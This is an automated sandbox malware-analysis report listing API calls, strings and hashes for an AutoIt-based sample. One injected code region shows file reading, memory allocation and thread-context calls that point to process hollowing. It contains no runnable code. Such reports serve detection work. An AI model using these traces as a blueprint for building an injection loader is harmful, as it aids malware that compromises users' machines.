                                                                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                        • Instruction ID: 2ba535d205d1417c7bbf2f91f648a5873db10703772e570f436857d0a52bff6b
                                                                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                        • Instruction Fuzzy Hash: 9EA10970E10209EBEB14CFA4C895FEEBBB5BF48304F208559E605BB280D7759A81CF65

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1196 8f49fb-8f4a25 call 8fbcce RegOpenKeyExW 1199 8f4a2b-8f4a2f 1196->1199 1200 9641cc-9641e3 RegQueryValueExW 1196->1200 1201 964246-96424f RegCloseKey 1200->1201 1202 9641e5-964222 call 90f4ea call 8f47b7 RegQueryValueExW 1200->1202 1207 964224-96423b call 8f6a63 1202->1207 1208 96423d-964245 call 8f47e2 1202->1208 1207->1208 1208->1201
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008F4A1D
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009641DB
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0096421A
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00964249
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseOpen
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                        • API String ID: 1586453840-614718249
                                                                        • Opcode ID: f99c32142f4d31457f400bdf49ed19d5c653e596a07093f2b9e7a99e4db37962
                                                                        • Instruction ID: b2f7d26e963a70962ad2bc33ac4f25c21cb043a362e42ade678e375552716f0d
                                                                        • Opcode Fuzzy Hash: f99c32142f4d31457f400bdf49ed19d5c653e596a07093f2b9e7a99e4db37962
                                                                        • Instruction Fuzzy Hash: AE114F7161110CBFEB04ABA8DD96DBF7BBCEF15344F101059F506E6191EA70AE41DB50

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1223 8f36b8-8f3728 CreateWindowExW * 2 ShowWindow * 2
                                                                        APIs
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008F36E6
                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F3707
                                                                        • ShowWindow.USER32(00000000,?,?,?,?,008F3AA3,?), ref: 008F371B
                                                                        • ShowWindow.USER32(00000000,?,?,?,?,008F3AA3,?), ref: 008F3724
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateShow
                                                                        • String ID: AutoIt v3$edit
                                                                        • API String ID: 1584632944-3779509399
                                                                        • Opcode ID: 01aac1297179458aad71c2f44ba62b956b2a00c9566b8a5c182f642370542ea9
                                                                        • Instruction ID: 78e8bc83ea63e8b0a86c6214a5656f8f98def6ee2a5dec9f876e7a13562bdc3e
                                                                        • Opcode Fuzzy Hash: 01aac1297179458aad71c2f44ba62b956b2a00c9566b8a5c182f642370542ea9
                                                                        • Instruction Fuzzy Hash: 41F03A729692D07AEB306757AD18E673E7DD7C6F30F60011AFA08A22A0C16108C1EAB0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1328 1276a28-1276b66 call 1274678 call 1276918 CreateFileW 1335 1276b6d-1276b7d 1328->1335 1336 1276b68 1328->1336 1339 1276b84-1276b9e VirtualAlloc 1335->1339 1340 1276b7f 1335->1340 1337 1276c1d-1276c22 1336->1337 1341 1276ba2-1276bb9 ReadFile 1339->1341 1342 1276ba0 1339->1342 1340->1337 1343 1276bbd-1276bf7 call 1276958 call 1275918 1341->1343 1344 1276bbb 1341->1344 1342->1337 1349 1276c13-1276c1b ExitProcess 1343->1349 1350 1276bf9-1276c0e call 12769a8 1343->1350 1344->1337 1349->1337 1350->1349
                                                                        APIs
                                                                          • Part of subcall function 01276918: Sleep.KERNELBASE(000001F4), ref: 01276929
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01276B5C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1288344983.0000000001274000.00000040.00000020.00020000.00000000.sdmp, Offset: 01274000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1274000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileSleep
                                                                        • String ID: MH4C252G0QQ8BKFT9P5BF05
                                                                        • API String ID: 2694422964-2467997446
                                                                        • Opcode ID: 2dc023986499023ddc4873005bf48a89b09acf4d787493ae8008d3fd3e6d6c03
                                                                        • Instruction ID: b0797ecf46acc5c630010c61879c10d4afc03bebb366e6a5da2e1f0aa2a7a2f0
                                                                        • Opcode Fuzzy Hash: 2dc023986499023ddc4873005bf48a89b09acf4d787493ae8008d3fd3e6d6c03
                                                                        • Instruction Fuzzy Hash: 18518470D14289DAEF12DBA4C858BEFBB78AF15304F044199E248BB2C1D7B91B45CBA5
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F522F
                                                                        • _wcscpy.LIBCMT ref: 008F5283
                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008F5293
                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00963CB0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                        • String ID: Line:
                                                                        • API String ID: 1053898822-1585850449
                                                                        • Opcode ID: 65e4ae20eee340c76251d79366770ba40940d831f7b7213cbf756d336be5d0ed
                                                                        • Instruction ID: 45b05a8ce14d98a3bf81bd435b283c0eb99e676ced664822d9bce16d11baf978
                                                                        • Opcode Fuzzy Hash: 65e4ae20eee340c76251d79366770ba40940d831f7b7213cbf756d336be5d0ed
                                                                        • Instruction Fuzzy Hash: B1318F715087486BD320EB64DC42BEA77D8FB84314F50461AF799D2091EB70A6888B97
                                                                        APIs
                                                                          • Part of subcall function 008F41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008F39FE,?,00000001), ref: 008F41DB
                                                                        • _free.LIBCMT ref: 009636B7
                                                                        • _free.LIBCMT ref: 009636FE
                                                                          • Part of subcall function 008FC833: __wsplitpath.LIBCMT ref: 008FC93E
                                                                          • Part of subcall function 008FC833: _wcscpy.LIBCMT ref: 008FC953
                                                                          • Part of subcall function 008FC833: _wcscat.LIBCMT ref: 008FC968
                                                                          • Part of subcall function 008FC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008FC978
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                        • API String ID: 805182592-1757145024
                                                                        • Opcode ID: 835baffed4c5f729b11d61a8c88dbdaaca09fc1711bcc7954f3c872274b6f9c6
                                                                        • Instruction ID: d721cf7118c4a709dc2ed1fb5b4dee9db42af35876f41814a94dd8f916f6a502
                                                                        • Opcode Fuzzy Hash: 835baffed4c5f729b11d61a8c88dbdaaca09fc1711bcc7954f3c872274b6f9c6
                                                                        • Instruction Fuzzy Hash: 65912B71910219AFCF04EFA8CC929EEB7B4FF59310F10842AF556EB291DB749A45CB90
                                                                        APIs
                                                                          • Part of subcall function 008F5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B1148,?,008F61FF,?,00000000,00000001,00000000), ref: 008F5392
                                                                          • Part of subcall function 008F49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008F4A1D
                                                                        • _wcscat.LIBCMT ref: 00962D80
                                                                        • _wcscat.LIBCMT ref: 00962DB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                        • String ID: \$\Include\
                                                                        • API String ID: 3592542968-2640467822
                                                                        • Opcode ID: b06a7c6ae9e085f4565ffe118881d083818c7f8fbc73c7252910964d6689f7b4
                                                                        • Instruction ID: e736dd47a58514c9c8940906f13b2815df6b3477fae05b17da49b0a1f1fce266
                                                                        • Opcode Fuzzy Hash: b06a7c6ae9e085f4565ffe118881d083818c7f8fbc73c7252910964d6689f7b4
                                                                        • Instruction Fuzzy Hash: D751847541C3449BC314EF6DDA918AAB3F8FF99320B404A2EF744D32A1EB709644DB52
                                                                        APIs
                                                                        • __getstream.LIBCMT ref: 009134FE
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00913539
                                                                        • __wopenfile.LIBCMT ref: 00913549
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                        • String ID: <G
                                                                        • API String ID: 1820251861-2138716496
                                                                        • Opcode ID: fb7c2370d9d7064f1525fb8de8fbd80652ce02197f33d7bee38230a841ae5f3f
                                                                        • Instruction ID: 5934d1286030ba9f639fc6f9a5fc07b0f3ab8b7960412bf12d25f6fcac6bd9d5
                                                                        • Opcode Fuzzy Hash: fb7c2370d9d7064f1525fb8de8fbd80652ce02197f33d7bee38230a841ae5f3f
                                                                        • Instruction Fuzzy Hash: 5D110A70B0020E9BDB12BFB08C427EE76B5AF85750B14C925F819D72D1EB34CAC197A1
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0090D28B,SwapMouseButtons,00000004,?), ref: 0090D2BC
                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0090D28B,SwapMouseButtons,00000004,?,?,?,?,0090C865), ref: 0090D2DD
                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,0090D28B,SwapMouseButtons,00000004,?,?,?,?,0090C865), ref: 0090D2FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 3677997916-824357125
                                                                        • Opcode ID: 31d3910b72b0bcd23fba9108e9b5d26624b4bd494de7886b72f36b3589f4cdf8
                                                                        • Instruction ID: cb272affcb32c6c9cc35f455b2a089c71c64f5932e64f7876aecd1ff4c580388
                                                                        • Opcode Fuzzy Hash: 31d3910b72b0bcd23fba9108e9b5d26624b4bd494de7886b72f36b3589f4cdf8
                                                                        • Instruction Fuzzy Hash: 8A113976616209BFDB208FA8CC84EAF7BBCEF45744F104869E805D7150E631AE41AB60
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 012760D3
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01276169
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0127618B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1288344983.0000000001274000.00000040.00000020.00020000.00000000.sdmp, Offset: 01274000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1274000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                        • Instruction ID: 33bc6f8ff2f0dd1e7c76f6a8fc44d990e0a090a9ef3c072bcbd1672e714ca3bb
                                                                        • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                        • Instruction Fuzzy Hash: 09621C30A24659DBEB24CFA4C851BDEB772EF58300F1091A9D20DEB390E7759E81CB59
                                                                        APIs
                                                                          • Part of subcall function 008F4517: _fseek.LIBCMT ref: 008F452F
                                                                          • Part of subcall function 0093C56D: _wcscmp.LIBCMT ref: 0093C65D
                                                                          • Part of subcall function 0093C56D: _wcscmp.LIBCMT ref: 0093C670
                                                                        • _free.LIBCMT ref: 0093C4DD
                                                                        • _free.LIBCMT ref: 0093C4E4
                                                                        • _free.LIBCMT ref: 0093C54F
                                                                          • Part of subcall function 00911C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00917A85), ref: 00911CB1
                                                                          • Part of subcall function 00911C9D: GetLastError.KERNEL32(00000000,?,00917A85), ref: 00911CC3
                                                                        • _free.LIBCMT ref: 0093C557
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                        • String ID:
                                                                        • API String ID: 1552873950-0
                                                                        • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                                        • Instruction ID: 0dd64f3f7227829a159fc1a1f511b7eb4bf473327c942f45c632546af8c7c7f4
                                                                        • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                                        • Instruction Fuzzy Hash: D5513DB1A04218AFDB149F68DC81BAEBBB9FF48304F10449EB259B3251DB715A908F59
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0090EBB2
                                                                          • Part of subcall function 008F51AF: _memset.LIBCMT ref: 008F522F
                                                                          • Part of subcall function 008F51AF: _wcscpy.LIBCMT ref: 008F5283
                                                                          • Part of subcall function 008F51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008F5293
                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 0090EC07
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0090EC16
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00963C88
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1378193009-0
                                                                        • Opcode ID: 00848326132946a8d60577847998cc946431a1ab41342b6e201c4100af145c91
                                                                        • Instruction ID: 842dbc1dfb9be4bc66cd90890ee883922ace3c186b548ff91bb74c7cd987cb3c
                                                                        • Opcode Fuzzy Hash: 00848326132946a8d60577847998cc946431a1ab41342b6e201c4100af145c91
                                                                        • Instruction Fuzzy Hash: 9421A7719087949FF7329B28C855BE7BBFC9F45308F04488DE6DE66181C3796A84CB51
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00963725
                                                                        • GetOpenFileNameW.COMDLG32 ref: 0096376F
                                                                          • Part of subcall function 008F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F53B1,?,?,008F61FF,?,00000000,00000001,00000000), ref: 008F662F
                                                                          • Part of subcall function 008F40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008F40C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                        • String ID: X
                                                                        • API String ID: 3777226403-3081909835
                                                                        • Opcode ID: 6d869ea25e3d505fae94d22b70e86a4070030f807fd1c2461292e4e1f7c2e3bd
                                                                        • Instruction ID: 5d5568835cf89f732b3a95484248926de045eb3c80e4e931ebd5bf600b63f8c3
                                                                        • Opcode Fuzzy Hash: 6d869ea25e3d505fae94d22b70e86a4070030f807fd1c2461292e4e1f7c2e3bd
                                                                        • Instruction Fuzzy Hash: A5219971A1425CABCF11DFA8D8457EE7BF8EF49304F00805AE505E7241DBF456898F55
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0093C72F
                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0093C746
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Temp$FileNamePath
                                                                        • String ID: aut
                                                                        • API String ID: 3285503233-3010740371
                                                                        • Opcode ID: 7d4a65de14222b29e83eef79626340c9761c5f45e7aa9c9de75e6eb731ccec86
                                                                        • Instruction ID: dbd7f255002459af3ce8129814da6b156b6b34401845541597eaaece769ffb52
                                                                        • Opcode Fuzzy Hash: 7d4a65de14222b29e83eef79626340c9761c5f45e7aa9c9de75e6eb731ccec86
                                                                        • Instruction Fuzzy Hash: DED05E7254030EABDB50AB90DC0EF8AB77C9F00708F0001A07664A50B2DAB0E6DA8B94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0fca04023e40808e0b4b7ac6084b8c216ecec1cc41a6b33a9550b7da10198d10
                                                                        • Instruction ID: 42216199bbef39e42fb296bdb7e0722438aedd9fd102faf16b141b44877385cd
                                                                        • Opcode Fuzzy Hash: 0fca04023e40808e0b4b7ac6084b8c216ecec1cc41a6b33a9550b7da10198d10
                                                                        • Instruction Fuzzy Hash: 85F16A716083029FCB14DF28C495B6AB7E5FFC9314F10896EF9999B292D730E905CB82
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F5022
                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F50CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell__memset
                                                                        • String ID:
                                                                        • API String ID: 928536360-0
                                                                        • Opcode ID: 7eac494b629b9a9c95eef341edcc239c6da33d9c11cc440fd558d2b651973240
                                                                        • Instruction ID: d743af7bd20742f43cb3b833ad87ac381b6829973b8b127aa3e3e441696cf299
                                                                        • Opcode Fuzzy Hash: 7eac494b629b9a9c95eef341edcc239c6da33d9c11cc440fd558d2b651973240
                                                                        • Instruction Fuzzy Hash: 7E3180B1508B05DFD721DF38D9456A7BBE8FF88318F00092EF69AC2251E7716944CB92
                                                                        APIs
                                                                        • __FF_MSGBANNER.LIBCMT ref: 00913973
                                                                          • Part of subcall function 009181C2: __NMSG_WRITE.LIBCMT ref: 009181E9
                                                                          • Part of subcall function 009181C2: __NMSG_WRITE.LIBCMT ref: 009181F3
                                                                        • __NMSG_WRITE.LIBCMT ref: 0091397A
                                                                          • Part of subcall function 0091821F: GetModuleFileNameW.KERNEL32(00000000,009B0312,00000104,00000000,00000001,00000000), ref: 009182B1
                                                                          • Part of subcall function 0091821F: ___crtMessageBoxW.LIBCMT ref: 0091835F
                                                                          • Part of subcall function 00911145: ___crtCorExitProcess.LIBCMT ref: 0091114B
                                                                          • Part of subcall function 00911145: ExitProcess.KERNEL32 ref: 00911154
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
